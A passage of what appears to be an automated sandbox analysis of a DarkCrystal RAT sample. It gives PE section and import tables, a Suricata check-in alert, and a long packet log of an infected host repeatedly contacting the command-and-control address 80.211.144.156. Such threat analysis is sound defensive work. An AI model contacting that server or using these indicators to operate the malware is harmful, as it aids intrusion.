                               | 0x3e000 | 0x25000 | 0x800 | 63dee323469ab12c85a8eff2e1cf0670 | False | 0.91162109375 | data | 7.481225763284233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               | 0x63000 | 0x1000 | 0x200 | 950aaa43d88a78b7e3d61706d93a8fce | False | 0.447265625 | data | 3.736202914992948 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               | 0x64000 | 0x47000 | 0x2600 | 6b4356c87c8083ada28595f8d33d11f4 | False | 0.9839638157894737 | data | 7.944529268421742 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               | 0xab000 | 0x3000 | 0x2000 | d927fc8f4c02ae4a77b9c99bcad7a431 | False | 0.958740234375 | data | 7.852938121836332 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc | 0xae000 | 0x44000 | 0x43e00 | eade0d48852f87b43908ce2cf1642fdf | False | 0.09729296155616943 | data | 5.031754772122344 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               | 0xf2000 | 0x27f000 | 0x2ba00 | b4eba047bbe81d8ac31ad86e90e657af | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              cheat | 0x371000 | 0xe7000 | 0xe6c00 | f5ff2c4725e6783e4f543d5970bb4bfb | False | 0.99721420469935 | data | 7.987925279314385 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                              PNG | 0x64524 | 0xb45 | data | English | United States | 1.0038128249566725
                              PNG | 0x6506c | 0x15a9 | data | English | United States | 0.97302679217958
                              RT_ICON | 0xae524 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144 |  |  | 0.08887993017131698
                              RT_DIALOG | 0xa8640 | 0x286 | empty | English | United States | 0
                              RT_DIALOG | 0xa88c8 | 0x13a | empty | English | United States | 0
                              RT_DIALOG | 0xa8a04 | 0xec | empty | English | United States | 0
                              RT_DIALOG | 0xa8af0 | 0x12e | empty | English | United States | 0
                              RT_DIALOG | 0xa8c20 | 0x338 | empty | English | United States | 0
                              RT_DIALOG | 0xa8f58 | 0x252 | empty | English | United States | 0
                              RT_STRING | 0xf054c | 0x1e2 | data | English | United States | 0.3900414937759336
                              RT_STRING | 0xf0730 | 0x1cc | data | English | United States | 0.4282608695652174
                              RT_STRING | 0xf08fc | 0x1b8 | data | English | United States | 0.45681818181818185
                              RT_STRING | 0xf0ab4 | 0x146 | data | English | United States | 0.5153374233128835
                              RT_STRING | 0xf0bfc | 0x46c | data | English | United States | 0.3454063604240283
                              RT_STRING | 0xf1068 | 0x166 | data | English | United States | 0.49162011173184356
                              RT_STRING | 0xf11d0 | 0x152 | data | English | United States | 0.5059171597633136
                              RT_STRING | 0xf1324 | 0x10a | data | English | United States | 0.49624060150375937
                              RT_STRING | 0xf1430 | 0xbc | data | English | United States | 0.6329787234042553
                              RT_STRING | 0xf14ec | 0xd6 | data | English | United States | 0.5747663551401869
                              RT_GROUP_ICON | 0xf15c4 | 0x14 | data |  |  | 1.1
                              RT_MANIFEST | 0xf15d8 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                              DLL | Import
                              kernel32.dll | GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                              user32.dll | MessageBoxA
                              advapi32.dll | RegCloseKey
                              oleaut32.dll | SysFreeString
                              gdi32.dll | CreateFontA
                              shell32.dll | ShellExecuteA
                              version.dll | GetFileVersionInfoA
                              gdiplus.dll | GdipAlloc
                              Language of compilation system | Country where language is spoken | Map
                              English | United States |
                              Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                              2024-08-25T15:43:29.322612+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49712 | 80 | 192.168.2.5 | 80.211.144.156
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Aug 25, 2024 15:43:45.078392982 CEST5987380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:45.083368063 CEST805987380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:45.083441973 CEST5987380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:45.083600998 CEST5987380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:45.085068941 CEST5987280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:45.089135885 CEST805987380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:45.437380075 CEST5987380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:45.442429066 CEST805987380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:45.442445040 CEST805987380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:45.442456007 CEST805987380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:45.778043985 CEST805987380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:45.911480904 CEST805987380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:45.911545038 CEST5987380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.038870096 CEST5987380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.039638996 CEST5987480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.044266939 CEST805987380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:46.044316053 CEST5987380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.044507980 CEST805987480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:46.044559956 CEST5987480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.044668913 CEST5987480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.049495935 CEST805987480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:46.397670031 CEST5987480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.402928114 CEST805987480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:46.402968884 CEST805987480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:46.402997971 CEST805987480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:46.717950106 CEST805987480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:46.855016947 CEST805987480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:46.855155945 CEST5987480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.974906921 CEST5987480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.975518942 CEST5987580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.980228901 CEST805987480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:46.980309963 CEST5987480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.980875015 CEST805987580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:46.980973959 CEST5987580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.981221914 CEST5987580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:46.987940073 CEST805987580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:47.337042093 CEST5987580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:47.342124939 CEST805987580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:47.342164993 CEST805987580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:47.342191935 CEST805987580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:47.649580002 CEST805987580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:47.725667000 CEST5987580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:47.778722048 CEST805987580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:47.896774054 CEST5987580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:47.897195101 CEST5987680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:47.902036905 CEST805987580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:47.902112007 CEST5987580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:47.902117968 CEST805987680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:47.902242899 CEST5987680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:47.902379036 CEST5987680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:47.907394886 CEST805987680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:48.259783030 CEST5987680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:48.264712095 CEST805987680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:48.264723063 CEST805987680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:48.264731884 CEST805987680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:48.554996967 CEST5987680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:48.555310011 CEST5987780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:48.560215950 CEST805987780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:48.560457945 CEST805987680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:48.560540915 CEST5987680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:48.560554981 CEST5987780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:48.560653925 CEST5987780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:48.565485001 CEST805987780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:48.677423000 CEST5987880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:48.682303905 CEST805987880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:48.682374001 CEST5987880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:48.682627916 CEST5987880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:48.687434912 CEST805987880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:48.913254976 CEST5987780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:48.918220997 CEST805987780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:48.918368101 CEST805987780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.038275957 CEST5987880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.116322994 CEST5987880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.246128082 CEST805987780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.246210098 CEST805987880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.246505976 CEST805987880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.246767998 CEST805987880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.246829987 CEST805987880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.357942104 CEST805987780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.358015060 CEST5987780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.376949072 CEST805987880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.428780079 CEST5987880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.586472034 CEST805987880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.631896019 CEST5987880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.707359076 CEST5987780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.707385063 CEST5987880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.708472013 CEST5987980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.712658882 CEST805987780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.712740898 CEST5987780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.713042974 CEST805987880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.713103056 CEST5987880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.713407993 CEST805987980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:49.716155052 CEST5987980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.716254950 CEST5987980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:49.721082926 CEST805987980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:50.070076942 CEST5987980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:50.076371908 CEST805987980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:50.076384068 CEST805987980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:50.076392889 CEST805987980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:50.391168118 CEST805987980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:50.444493055 CEST5987980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:50.518053055 CEST805987980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:50.569547892 CEST5987980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:50.648061991 CEST5988080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:50.653162003 CEST805988080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:50.655011892 CEST5988080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:50.655154943 CEST5988080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:50.659976959 CEST805988080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:51.007023096 CEST5988080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:51.012042046 CEST805988080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:51.012053967 CEST805988080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:51.012063026 CEST805988080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:51.322968960 CEST805988080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:51.366291046 CEST5988080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:51.449501038 CEST805988080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:51.491318941 CEST5988080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:51.567735910 CEST5988080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:51.568380117 CEST5988180192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:51.573322058 CEST805988180.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:51.573342085 CEST805988080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:51.573441982 CEST5988080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:51.573447943 CEST5988180192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:51.573580980 CEST5988180192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:51.578411102 CEST805988180.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:51.929222107 CEST5988180192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:51.935127020 CEST805988180.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:51.935261011 CEST805988180.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:51.935271025 CEST805988180.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:52.248102903 CEST805988180.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:52.288252115 CEST5988180192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:52.383662939 CEST805988180.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:52.428833008 CEST5988180192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:52.505135059 CEST5988180192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:52.505989075 CEST5988280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:52.510371923 CEST805988180.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:52.510898113 CEST805988280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:52.510965109 CEST5988180192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:52.510998964 CEST5988280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:52.511118889 CEST5988280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:52.515960932 CEST805988280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:52.866420984 CEST5988280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:52.871423006 CEST805988280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:52.871437073 CEST805988280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:52.871453047 CEST805988280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:53.206073046 CEST805988280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:53.256920099 CEST5988280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:53.336045980 CEST805988280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:53.381963968 CEST5988280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:53.864578009 CEST5987980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:53.888499975 CEST5988280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:53.891989946 CEST5988380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:53.893898010 CEST805988280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:53.893944979 CEST5988280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:53.896893978 CEST805988380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:53.896953106 CEST5988380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:53.898179054 CEST5988380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:53.905915976 CEST805988380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.257236958 CEST5988380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:54.262254000 CEST805988380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.262264967 CEST805988380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.262274027 CEST805988380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.372627020 CEST5988480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:54.373588085 CEST5988380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:54.377545118 CEST805988480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.377628088 CEST5988480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:54.378844023 CEST805988380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.378904104 CEST5988380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:54.379791021 CEST5988480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:54.385862112 CEST805988480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.551151037 CEST5988580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:54.556195021 CEST805988580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.556279898 CEST5988580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:54.556386948 CEST5988580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:54.561907053 CEST805988580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.726849079 CEST5988480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:54.731863976 CEST805988480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.731992960 CEST805988480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.913705111 CEST5988580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:54.918742895 CEST805988580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.918756008 CEST805988580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:54.921808958 CEST805988580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:55.068360090 CEST805988480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:55.116317987 CEST5988480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.203455925 CEST805988480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:55.223344088 CEST805988580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:55.256943941 CEST5988480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.272541046 CEST5988580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.357815981 CEST805988580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:55.415293932 CEST5988580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.474987030 CEST5988480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.475214958 CEST5988580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.476507902 CEST5988680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.480312109 CEST805988480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:55.480385065 CEST5988480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.480537891 CEST805988580.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:55.480717897 CEST5988580192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.481673002 CEST805988680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:55.481745005 CEST5988680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.481884003 CEST5988680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.486833096 CEST805988680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:55.836592913 CEST5988680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:55.841495991 CEST805988680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:55.841540098 CEST805988680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:55.841550112 CEST805988680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:56.164293051 CEST805988680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:56.210052967 CEST5988680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:56.301558018 CEST805988680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:56.350661039 CEST5988680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:56.442647934 CEST5988780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:56.448168993 CEST805988780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:56.448256969 CEST5988780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:56.448374033 CEST5988780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:56.453830957 CEST805988780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:56.804719925 CEST5988780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:56.809658051 CEST805988780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:56.809670925 CEST805988780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:56.809676886 CEST805988780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:57.133373022 CEST805988780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:57.178822994 CEST5988780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:57.265538931 CEST805988780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:57.319462061 CEST5988780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:57.377048016 CEST5988680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:57.383222103 CEST5988780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:57.383812904 CEST5988880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:57.388492107 CEST805988780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:57.388626099 CEST805988880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:57.388628006 CEST5988780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:57.388694048 CEST5988880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:57.388835907 CEST5988880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:57.393668890 CEST805988880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:57.742147923 CEST5988880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:57.747148037 CEST805988880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:57.747160912 CEST805988880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:57.747273922 CEST805988880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:58.076239109 CEST805988880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:58.131911039 CEST5988880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:58.210088968 CEST805988880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:58.257042885 CEST5988880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:58.337467909 CEST5988880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:58.337733030 CEST5988980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:58.342703104 CEST805988980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:58.342792034 CEST5988980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:58.342866898 CEST5988980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:58.342927933 CEST805988880.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:58.342977047 CEST5988880192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:58.347897053 CEST805988980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:58.747955084 CEST5988980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:58.752940893 CEST805988980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:58.752957106 CEST805988980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:58.752966881 CEST805988980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:59.017108917 CEST805988980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:59.069394112 CEST5988980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:59.214831114 CEST805988980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:59.257077932 CEST5988980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:59.345458031 CEST5988980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:59.346020937 CEST5989080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:59.350843906 CEST805988980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:59.350857973 CEST805989080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:59.350915909 CEST5988980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:59.350975990 CEST5989080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:59.351645947 CEST5989080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:59.358449936 CEST805989080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:59.711064100 CEST5989080192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:59.716027975 CEST805989080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:59.716038942 CEST805989080.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:59.716065884 CEST805989080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:00.016813993 CEST805989080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:00.069619894 CEST5989080192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:00.211801052 CEST5989080192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:00.212795973 CEST5989180192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:00.215145111 CEST805989080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:00.215238094 CEST5989080192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:00.216933012 CEST805989080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:00.216983080 CEST5989080192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:00.217653036 CEST805989180.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:00.217720032 CEST5989180192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:00.217914104 CEST5989180192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:00.222683907 CEST805989180.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:00.338232994 CEST5989280192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:00.343153000 CEST805989280.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:00.343255997 CEST5989280192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:00.347337961 CEST5989280192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:21.794653893 CEST5991680192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:21.795526981 CEST5991780192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:21.800029039 CEST805991680.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:21.800112009 CEST5991680192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:21.800399065 CEST805991780.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:21.800640106 CEST5991780192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:21.800733089 CEST5991780192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:21.805679083 CEST805991780.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:22.147754908 CEST5991780192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:22.152842999 CEST805991780.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:22.152854919 CEST805991780.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:22.152873039 CEST805991780.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:22.474215031 CEST805991780.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:22.522578955 CEST5991780192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:22.603671074 CEST805991780.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:22.647624016 CEST5991780192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:22.963210106 CEST5991380192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:22.968898058 CEST5991880192.168.2.580.211.144.156
